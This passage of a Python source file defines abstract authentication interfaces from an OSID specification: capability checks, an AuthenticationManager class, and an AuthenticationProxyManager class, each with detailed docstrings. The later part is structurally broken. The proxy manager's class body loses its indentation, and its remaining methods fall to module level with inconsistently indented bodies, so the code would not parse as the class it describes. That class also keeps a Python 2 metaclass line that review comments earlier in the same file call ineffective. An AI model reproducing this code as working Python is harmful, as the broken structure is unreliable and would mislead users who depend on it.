    def supports_agency_lookup(self):
        """Tests if an agency lookup service is supported.
        An agency lookup service defines methods to access agencies.
        :return: ``true`` if agency lookup is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agency_query(self):
        """Tests if an agency query service is supported.
        :return: ``true`` if agency query is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agency_search(self):
        """Tests if an agency search service is supported.
        :return: ``true`` if agency search is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agency_admin(self):
        """Tests if an agency administrative service is supported.
        :return: ``true`` if agency admin is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agency_notification(self):
        """Tests if agency notification is supported.
        Messages may be sent when agencies are created, modified, or
        deleted.
        :return: ``true`` if agency notification is supported ``,`` ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agency_hierarchy(self):
        """Tests if an agency hierarchy traversal is supported.
        :return: ``true`` if an agency hierarchy traversal is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_agency_hierarchy_design(self):
        """Tests if an agency hierarchy design is supported.
        :return: ``true`` if an agency hierarchy design is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_authentication_keys(self):
        """Tests if an authentication key service is available.
        :return: ``true`` if an authentication key service is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def supports_authentication_process(self):
        """Tests if an authentication process service is available.
        :return: ``true`` if an authentication process service is supported, ``false`` otherwise
        :rtype: ``boolean``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def get_agent_record_types(self):
        """Gets the supported ``Agent`` record types.
        :return: a list containing the supported ``Agent`` record types
        :rtype: ``osid.type.TypeList``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # osid.type.TypeList
    agent_record_types = property(fget=get_agent_record_types)
    @abc.abstractmethod
    def supports_agent_record_type(self, agent_record_type):
        """Tests if the given ``Agent`` record type is supported.
        :param agent_record_type: a ``Type`` indicating an ``Agent`` record type
        :type agent_record_type: ``osid.type.Type``
        :return: ``true`` if the given record Type is supported, ``false`` otherwise
        :rtype: ``boolean``
        :raise: ``NullArgument`` -- ``agent_record_type`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def get_agent_search_record_types(self):
        """Gets the supported ``Agent`` search record types.
        :return: a list containing the supported ``Agent`` search record types
        :rtype: ``osid.type.TypeList``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # osid.type.TypeList
    agent_search_record_types = property(fget=get_agent_search_record_types)
    @abc.abstractmethod
    def supports_agent_search_record_type(self, agent_search_record_type):
        """Tests if the given ``Agent`` search record type is supported.
        :param agent_search_record_type: a ``Type`` indicating an ``Agent`` search record type
        :type agent_search_record_type: ``osid.type.Type``
        :return: ``true`` if the given Type is supported, ``false`` otherwise
        :rtype: ``boolean``
        :raise: ``NullArgument`` -- ``agent_search_record_type`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def get_agency_record_types(self):
        """Gets the supported ``Agency`` record types.
        :return: a list containing the supported ``Agency`` record types
        :rtype: ``osid.type.TypeList``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # osid.type.TypeList
    agency_record_types = property(fget=get_agency_record_types)
    @abc.abstractmethod
    def supports_agency_record_type(self, agency_record_type):
        """Tests if the given ``Agency`` record type is supported.
        :param agency_record_type: a ``Type`` indicating an ``Agency`` record type
        :type agency_record_type: ``osid.type.Type``
        :return: ``true`` if the given record Type is supported, ``false`` otherwise
        :rtype: ``boolean``
        :raise: ``NullArgument`` -- ``agency_record_type`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
    @abc.abstractmethod
    def get_agency_search_record_types(self):
        """Gets the supported ``Agency`` search record types.
        :return: a list containing the supported ``Agency`` search record types
        :rtype: ``osid.type.TypeList``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # osid.type.TypeList
    agency_search_record_types = property(fget=get_agency_search_record_types)
    @abc.abstractmethod
    def supports_agency_search_record_type(self, agency_search_record_type):
        """Tests if the given ``Agency`` search record type is supported.
        :param agency_search_record_type: a ``Type`` indicating an ``Agency`` search record type
        :type agency_search_record_type: ``osid.type.Type``
        :return: ``true`` if the given Type is supported, ``false`` otherwise
        :rtype: ``boolean``
        :raise: ``NullArgument`` -- ``agency_search_record_type`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        return  # boolean
class AuthenticationManager(metaclass=abc.ABCMeta):
    """The authentication manager provides access to authentication sessions and provides interoperability tests for various aspects of this service.
    The sessions included in this manager are:
    * ``AgentLookupSession:`` a session to look up ``Agents``
    * ``AgentQuerySession:`` a session to query ``Agents``
    * ``AgentSearchSession:`` a session to search ``Agents``
    * ``AgentAdminSession:`` a session to create, modify and delete
    ``Agents``
    * ``AgentNotificationSession:`` a session to receive messages
    pertaining to ``Agent`` changes
    * ``AgentAgencySession:`` a session to retrieve ``Agent`` to
    ``Agency`` mappings
    * ``AgentAgencyAssignmentSession:`` a session to manage ``Agent``
    to ``Agency`` mappings
    * ``AgentSmartAgencySession:`` a session to create dynamic
    agencies
    * ``AgencyLookupSession:`` a session to lookup agencies
    * ``AgencyQuerySession:`` a session to query agencies
    * ``AgencySearchSession`` : a session to search agencies
    * ``AgencyAdminSession`` : a session to create, modify and delete
    agencies
    * ``AgencyNotificationSession`` : a session to receive messages
    pertaining to ``Agency`` changes
    * ``AgencyHierarchySession`` : a session to traverse the
    ``Agency`` hierarchy
    * ``AgencyHierarchyDesignSession`` : a session to manage the
    ``Agency`` hierarchy
    """
    # NOTE(review): the original declared ``__metaclass__ = abc.ABCMeta`` (Python 2
    # syntax), a no-op on Python 3 that left the @abc.abstractmethod decorators
    # unenforced; declaring the metaclass in the class header fixes that.
    # NOTE(review): the docstring advertises an ``AgencyQuerySession`` but no
    # ``get_agency_query_session`` method is defined here -- presumably an omission
    # in the generated spec; not added, since a new abstract method would break
    # existing subclasses.  TODO confirm against the OSID specification.
    @abc.abstractmethod
    def get_agent_lookup_session(self):
        """Gets the ``OsidSession`` associated with the agent lookup service.
        :return: an ``AgentLookupSession``
        :rtype: ``osid.authentication.AgentLookupSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_lookup()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_lookup()`` is ``true``.*
        """
        return  # osid.authentication.AgentLookupSession
    agent_lookup_session = property(fget=get_agent_lookup_session)
    @abc.abstractmethod
    def get_agent_lookup_session_for_agency(self, agency_id):
        """Gets the ``OsidSession`` associated with the agent lookup service for the given agency.
        :param agency_id: the ``Id`` of the agency
        :type agency_id: ``osid.id.Id``
        :return: ``an _agent_lookup_session``
        :rtype: ``osid.authentication.AgentLookupSession``
        :raise: ``NotFound`` -- ``agency_id`` not found
        :raise: ``NullArgument`` -- ``agency_id`` is ``null``
        :raise: ``OperationFailed`` -- ``unable to complete request``
        :raise: ``Unimplemented`` -- ``supports_agent_lookup()`` or ``supports_visible_federation()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_lookup()`` and
        ``supports_visible_federation()`` are ``true``.*
        """
        return  # osid.authentication.AgentLookupSession
    @abc.abstractmethod
    def get_agent_query_session(self):
        """Gets the ``OsidSession`` associated with the agent query service.
        :return: an ``AgentQuerySession``
        :rtype: ``osid.authentication.AgentQuerySession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_query()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_query()`` is ``true``.*
        """
        return  # osid.authentication.AgentQuerySession
    agent_query_session = property(fget=get_agent_query_session)
    @abc.abstractmethod
    def get_agent_query_session_for_agency(self, agency_id):
        """Gets the ``OsidSession`` associated with the agent query service for the given agency.
        :param agency_id: the ``Id`` of the agency
        :type agency_id: ``osid.id.Id``
        :return: ``an _agent_query_session``
        :rtype: ``osid.authentication.AgentQuerySession``
        :raise: ``NotFound`` -- ``agency_id`` not found
        :raise: ``NullArgument`` -- ``agency_id`` is ``null``
        :raise: ``OperationFailed`` -- ``unable to complete request``
        :raise: ``Unimplemented`` -- ``supports_agent_query()`` or ``supports_visible_federation()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_query()`` and ``supports_visible_federation()``
        are ``true``.*
        """
        return  # osid.authentication.AgentQuerySession
    @abc.abstractmethod
    def get_agent_search_session(self):
        """Gets the ``OsidSession`` associated with the agent search service.
        :return: an ``AgentSearchSession``
        :rtype: ``osid.authentication.AgentSearchSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_search()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_search()`` is ``true``.*
        """
        return  # osid.authentication.AgentSearchSession
    agent_search_session = property(fget=get_agent_search_session)
    @abc.abstractmethod
    def get_agent_search_session_for_agency(self, agency_id):
        """Gets the ``OsidSession`` associated with the agent search service for the given agency.
        :param agency_id: the ``Id`` of the agency
        :type agency_id: ``osid.id.Id``
        :return: ``an _agent_search_session``
        :rtype: ``osid.authentication.AgentSearchSession``
        :raise: ``NotFound`` -- ``agency_id`` not found
        :raise: ``NullArgument`` -- ``agency_id`` is ``null``
        :raise: ``OperationFailed`` -- ``unable to complete request``
        :raise: ``Unimplemented`` -- ``supports_agent_search()`` or ``supports_visible_federation()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_search()`` and
        ``supports_visible_federation()`` are ``true``.*
        """
        return  # osid.authentication.AgentSearchSession
    @abc.abstractmethod
    def get_agent_admin_session(self):
        """Gets the ``OsidSession`` associated with the agent administration service.
        :return: an ``AgentAdminSession``
        :rtype: ``osid.authentication.AgentAdminSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_admin()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_admin()`` is ``true``.*
        """
        return  # osid.authentication.AgentAdminSession
    agent_admin_session = property(fget=get_agent_admin_session)
    @abc.abstractmethod
    def get_agent_admin_session_for_agency(self, agency_id):
        """Gets the ``OsidSession`` associated with the agent admin service for the given agency.
        :param agency_id: the ``Id`` of the agency
        :type agency_id: ``osid.id.Id``
        :return: ``an _agent_admin_session``
        :rtype: ``osid.authentication.AgentAdminSession``
        :raise: ``NotFound`` -- ``agency_id`` not found
        :raise: ``NullArgument`` -- ``agency_id`` is ``null``
        :raise: ``OperationFailed`` -- ``unable to complete request``
        :raise: ``Unimplemented`` -- ``supports_agent_admin()`` or ``supports_visible_federation()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_admin()`` and ``supports_visible_federation()``
        are ``true``.*
        """
        return  # osid.authentication.AgentAdminSession
    @abc.abstractmethod
    def get_agent_notification_session(self, agent_receiver):
        """Gets the notification session for notifications pertaining to service changes.
        :param agent_receiver: the agent receiver
        :type agent_receiver: ``osid.authentication.AgentReceiver``
        :return: an ``AgentNotificationSession``
        :rtype: ``osid.authentication.AgentNotificationSession``
        :raise: ``NullArgument`` -- ``agent_receiver`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_notification()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_notification()`` is ``true``.*
        """
        return  # osid.authentication.AgentNotificationSession
    @abc.abstractmethod
    def get_agent_notification_session_for_agency(self, agent_receiver, agency_id):
        """Gets the ``OsidSession`` associated with the agent notification service for the given agency.
        :param agent_receiver: the agent receiver
        :type agent_receiver: ``osid.authentication.AgentReceiver``
        :param agency_id: the ``Id`` of the agency
        :type agency_id: ``osid.id.Id``
        :return: ``an _agent_notification_session``
        :rtype: ``osid.authentication.AgentNotificationSession``
        :raise: ``NotFound`` -- ``agency_id`` not found
        :raise: ``NullArgument`` -- ``agent_receiver`` or ``agency_id`` is ``null``
        :raise: ``OperationFailed`` -- ``unable to complete request``
        :raise: ``Unimplemented`` -- ``supports_agent_notification()`` or ``supports_visible_federation()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_notification()`` and
        ``supports_visible_federation()`` are ``true``.*
        """
        return  # osid.authentication.AgentNotificationSession
    @abc.abstractmethod
    def get_agent_agency_session(self):
        """Gets the session for retrieving agent to agency mappings.
        :return: an ``AgentAgencySession``
        :rtype: ``osid.authentication.AgentAgencySession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_agency()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_agency()`` is ``true``.*
        """
        return  # osid.authentication.AgentAgencySession
    agent_agency_session = property(fget=get_agent_agency_session)
    @abc.abstractmethod
    def get_agent_agency_assignment_session(self):
        """Gets the session for assigning agent to agency mappings.
        :return: an ``AgentAgencyAssignmentSession``
        :rtype: ``osid.authentication.AgentAgencyAssignmentSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_agency_assignment()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_agency_assignment()`` is ``true``.*
        """
        return  # osid.authentication.AgentAgencyAssignmentSession
    agent_agency_assignment_session = property(fget=get_agent_agency_assignment_session)
    @abc.abstractmethod
    def get_agent_smart_agency_session(self, agency_id):
        """Gets the ``OsidSession`` associated with the agent smart agency service for the given agency.
        :param agency_id: the ``Id`` of the agency
        :type agency_id: ``osid.id.Id``
        :return: an ``AgentSmartAgencySession``
        :rtype: ``osid.authentication.AgentSmartAgencySession``
        :raise: ``NotFound`` -- ``agency_id`` not found
        :raise: ``NullArgument`` -- ``agency_id`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agent_smart_agency()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agent_smart_agency()`` and
        ``supports_visible_federation()`` are ``true``.*
        """
        return  # osid.authentication.AgentSmartAgencySession
    @abc.abstractmethod
    def get_agency_lookup_session(self):
        """Gets the ``OsidSession`` associated with the agency lookup service.
        :return: an ``AgencyLookupSession``
        :rtype: ``osid.authentication.AgencyLookupSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agency_lookup()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agency_lookup()`` is ``true``.*
        """
        return  # osid.authentication.AgencyLookupSession
    agency_lookup_session = property(fget=get_agency_lookup_session)
    @abc.abstractmethod
    def get_agency_search_session(self):
        """Gets the ``OsidSession`` associated with the agency search service.
        :return: an ``AgencySearchSession``
        :rtype: ``osid.authentication.AgencySearchSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agency_search()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agency_search()`` is ``true``.*
        """
        return  # osid.authentication.AgencySearchSession
    agency_search_session = property(fget=get_agency_search_session)
    @abc.abstractmethod
    def get_agency_admin_session(self):
        """Gets the ``OsidSession`` associated with the agency administration service.
        :return: an ``AgencyAdminSession``
        :rtype: ``osid.authentication.AgencyAdminSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agency_admin()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agency_admin()`` is ``true``.*
        """
        return  # osid.authentication.AgencyAdminSession
    agency_admin_session = property(fget=get_agency_admin_session)
    @abc.abstractmethod
    def get_agency_notification_session(self, agency_receiver):
        """Gets the notification session for notifications pertaining to agency service changes.
        :param agency_receiver: the agency receiver
        :type agency_receiver: ``osid.authentication.AgencyReceiver``
        :return: an ``AgencyNotificationSession``
        :rtype: ``osid.authentication.AgencyNotificationSession``
        :raise: ``NullArgument`` -- ``agency_receiver`` is ``null``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agency_notification()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agency_notification()`` is ``true``.*
        """
        return  # osid.authentication.AgencyNotificationSession
    @abc.abstractmethod
    def get_agency_hierarchy_session(self):
        """Gets the session traversing agency hierarchies.
        :return: an ``AgencyHierarchySession``
        :rtype: ``osid.authentication.AgencyHierarchySession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agency_hierarchy()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agency_hierarchy()`` is ``true``.*
        """
        return  # osid.authentication.AgencyHierarchySession
    agency_hierarchy_session = property(fget=get_agency_hierarchy_session)
    @abc.abstractmethod
    def get_agency_hierarchy_design_session(self):
        """Gets the session designing agency hierarchies.
        :return: an ``AgencyHierarchyDesignSession``
        :rtype: ``osid.authentication.AgencyHierarchyDesignSession``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_agency_hierarchy_design()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_agency_hierarchy_design()`` is ``true``.*
        """
        return  # osid.authentication.AgencyHierarchyDesignSession
    agency_hierarchy_design_session = property(fget=get_agency_hierarchy_design_session)
    @abc.abstractmethod
    def get_authentication_batch_manager(self):
        """Gets an ``AuthenticationBatchManager``.
        :return: an ``AuthenticationBatchManager``.
        :rtype: ``osid.authentication.batch.AuthenticationBatchManager``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_authentication_batch()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_authentication_batch()`` is ``true``.*
        """
        return  # osid.authentication.batch.AuthenticationBatchManager
    authentication_batch_manager = property(fget=get_authentication_batch_manager)
    @abc.abstractmethod
    def get_authentication_keys_manager(self):
        """Gets an ``AuthenticationKeysManager``.
        :return: an ``AuthenticationKeysManager``.
        :rtype: ``osid.authentication.keys.AuthenticationKeysManager``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_authentication_keys()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_authentication_keys()`` is ``true``.*
        """
        return  # osid.authentication.keys.AuthenticationKeysManager
    authentication_keys_manager = property(fget=get_authentication_keys_manager)
    @abc.abstractmethod
    def get_authentication_process_manager(self):
        """Gets an ``AuthenticationProcessManager``.
        :return: an ``AuthenticationProcessManager``.
        :rtype: ``osid.authentication.process.AuthenticationProcessManager``
        :raise: ``OperationFailed`` -- unable to complete request
        :raise: ``Unimplemented`` -- ``supports_authentication_process()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_authentication_process()`` is ``true``.*
        """
        return  # osid.authentication.process.AuthenticationProcessManager
    authentication_process_manager = property(fget=get_authentication_process_manager)
class AuthenticationProxyManager:
"""The authentication proxy manager provides access to authentication sessions and provides interoperability tests for various aspects of this service.
Methods in this manager support the passing of a ``Proxy`` object.
The sessions included in this manager are:
* ``AgentLookupSession:`` session to look up ``Agents``
* ``AgentQuerySession`` : a session to query ``Agents``
* ``AgentSearchSession:`` session to search ``Agents``
* ``AgentAdminSession:`` session to create, modify and delete
``Agents``
* Agent ``NotificationSession:`` session to receive messages
pertaining to ``Agent`` changes
* ``AgentAgencySession:`` a session to retrieve ``Agent`` to
``Agency`` mappings
* ``AgentAgencyAssignmentSession:`` a session to manage ``Agent``
to ``Agency`` mappings
* ``AgentSmartAgencySession:`` a session to create dynamic
agencies
* ``AgencyLookupSession:`` a session to lookup agencies
* ``AgencyQuerySession:`` a session to query agencies
* ``AgencySearchSession`` : a session to search agencies
* ``AgencyAdminSession`` : a session to create, modify and delete
agencies
* ``AgencyNotificationSession`` : a session to receive messages
pertaining to ``Agency`` changes
* ``AgencyHierarchySession`` : a session to traverse the
``Agency`` hierarchy
* ``AgencyHierarchyDesignSession`` : a session to manage the
``Agency`` hierarchy
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_agent_lookup_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent lookup service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentLookupSession``
:rtype: ``osid.authentication.AgentLookupSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_lookup()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_lookup()`` is ``true``.*
"""
return # osid.authentication.AgentLookupSession
@abc.abstractmethod
def get_agent_lookup_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent lookup service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: ``an _agent_lookup_session``
:rtype: ``osid.authentication.AgentLookupSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_lookup()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_lookup()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentLookupSession
@abc.abstractmethod
def get_agent_query_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent query service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentQuerySession``
:rtype: ``osid.authentication.AgentQuerySession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_query()`` is ``true``.*
"""
return # osid.authentication.AgentQuerySession
@abc.abstractmethod
def get_agent_query_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent query service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentQuerySession``
:rtype: ``osid.authentication.AgentQuerySession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_query()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_query()`` and ``supports_visible_federation()``
are ``true``.*
"""
return # osid.authentication.AgentQuerySession
@abc.abstractmethod
def get_agent_search_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent search service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentSearchSession``
:rtype: ``osid.authentication.AgentSearchSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_search()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_search()`` is ``true``.*
"""
return # osid.authentication.AgentSearchSession
@abc.abstractmethod
def get_agent_search_session_for_agency(self, agency_id, proxy):
"""Gets the ``OsidSession`` associated with the agent search service for the given agency.
:param agency_id: the ``Id`` of the agency
:type agency_id: ``osid.id.Id``
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: ``an _agent_search_session``
:rtype: ``osid.authentication.AgentSearchSession``
:raise: ``NotFound`` -- ``agency_id`` not found
:raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
:raise: ``OperationFailed`` -- ``unable to complete request``
:raise: ``Unimplemented`` -- ``supports_agent_search()`` or ``supports_visible_federation()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_search()`` and
``supports_visible_federation()`` are ``true``.*
"""
return # osid.authentication.AgentSearchSession
@abc.abstractmethod
def get_agent_admin_session(self, proxy):
"""Gets the ``OsidSession`` associated with the agent administration service.
:param proxy: a proxy
:type proxy: ``osid.proxy.Proxy``
:return: an ``AgentAdminSession``
:rtype: ``osid.authentication.AgentAdminSession``
:raise: ``NullArgument`` -- ``proxy`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unimplemented`` -- ``supports_agent_admin()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_agent_admin()`` is ``true``.*
"""
return # osid.authentication.AgentAdminSession
@abc.abstractmethod
def get_agent_admin_session_for_agency(self, agency_id, proxy):
    """Gets the ``OsidSession`` associated with the agent admin service for the given agency.

    :param agency_id: the ``Id`` of the agency
    :type agency_id: ``osid.id.Id``
    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgentAdminSession``
    :rtype: ``osid.authentication.AgentAdminSession``
    :raise: ``NotFound`` -- ``agency_id`` not found
    :raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agent_admin()`` or ``supports_visible_federation()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agent_admin()`` and ``supports_visible_federation()``
    are ``true``.*

    """
    return  # osid.authentication.AgentAdminSession
@abc.abstractmethod
def get_agent_notification_session(self, agent_receiver, proxy):
    """Gets the messaging receiver session for notifications pertaining to agent changes.

    :param agent_receiver: the agent receiver
    :type agent_receiver: ``osid.authentication.AgentReceiver``
    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgentNotificationSession``
    :rtype: ``osid.authentication.AgentNotificationSession``
    :raise: ``NullArgument`` -- ``proxy`` or ``agent_receiver`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agent_notification()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agent_notification()`` is ``true``.*

    """
    return  # osid.authentication.AgentNotificationSession
@abc.abstractmethod
def get_agent_notification_session_for_agency(self, agent_receiver, agency_id, proxy):
    """Gets the ``OsidSession`` associated with the agent notification service for the given agency.

    :param agent_receiver: the agent receiver
    :type agent_receiver: ``osid.authentication.AgentReceiver``
    :param agency_id: the ``Id`` of the agency
    :type agency_id: ``osid.id.Id``
    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgentNotificationSession``
    :rtype: ``osid.authentication.AgentNotificationSession``
    :raise: ``NotFound`` -- ``agency_id`` not found
    :raise: ``NullArgument`` -- ``agent_receiver, agency_id`` or ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agent_notification()`` or ``supports_visible_federation()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agent_notification()`` and
    ``supports_visible_federation()`` are ``true``.*

    """
    return  # osid.authentication.AgentNotificationSession
@abc.abstractmethod
def get_agent_agency_session(self, proxy):
    """Gets the session for retrieving agent to agency mappings.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgentAgencySession``
    :rtype: ``osid.authentication.AgentAgencySession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agent_agency()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agent_agency()`` is ``true``.*

    """
    return  # osid.authentication.AgentAgencySession
@abc.abstractmethod
def get_agent_agency_assignment_session(self, proxy):
    """Gets the session for assigning agent to agency mappings.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgentAgencyAssignmentSession``
    :rtype: ``osid.authentication.AgentAgencyAssignmentSession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agent_agency_assignment()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agent_agency_assignment()`` is ``true``.*

    """
    return  # osid.authentication.AgentAgencyAssignmentSession
@abc.abstractmethod
def get_agent_smart_agency_session(self, agency_id, proxy):
    """Gets the ``OsidSession`` associated with the agent smart agency service for the given agency.

    :param agency_id: the ``Id`` of the agency
    :type agency_id: ``osid.id.Id``
    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgentSmartAgencySession``
    :rtype: ``osid.authentication.AgentSmartAgencySession``
    :raise: ``NotFound`` -- ``agency_id`` not found
    :raise: ``NullArgument`` -- ``agency_id`` or ``proxy`` is ``null``
    :raise: ``OperationFailed`` -- unable to complete request
    :raise: ``Unimplemented`` -- ``supports_agent_smart_agency()`` is ``false``

    *compliance: optional -- This method must be implemented if
    ``supports_agent_smart_agency()`` and
    ``supports_visible_federation()`` are ``true``.*

    """
    return  # osid.authentication.AgentSmartAgencySession
@abc.abstractmethod
def get_agency_lookup_session(self, proxy):
    """Gets the ``OsidSession`` associated with the agency lookup service.

    :param proxy: a proxy
    :type proxy: ``osid.proxy.Proxy``
    :return: an ``AgencyLookupSession``
    :rtype: ``osid.authentication.AgencyLookupSession``
    :raise: ``NullArgument`` -- ``proxy`` is ``null``
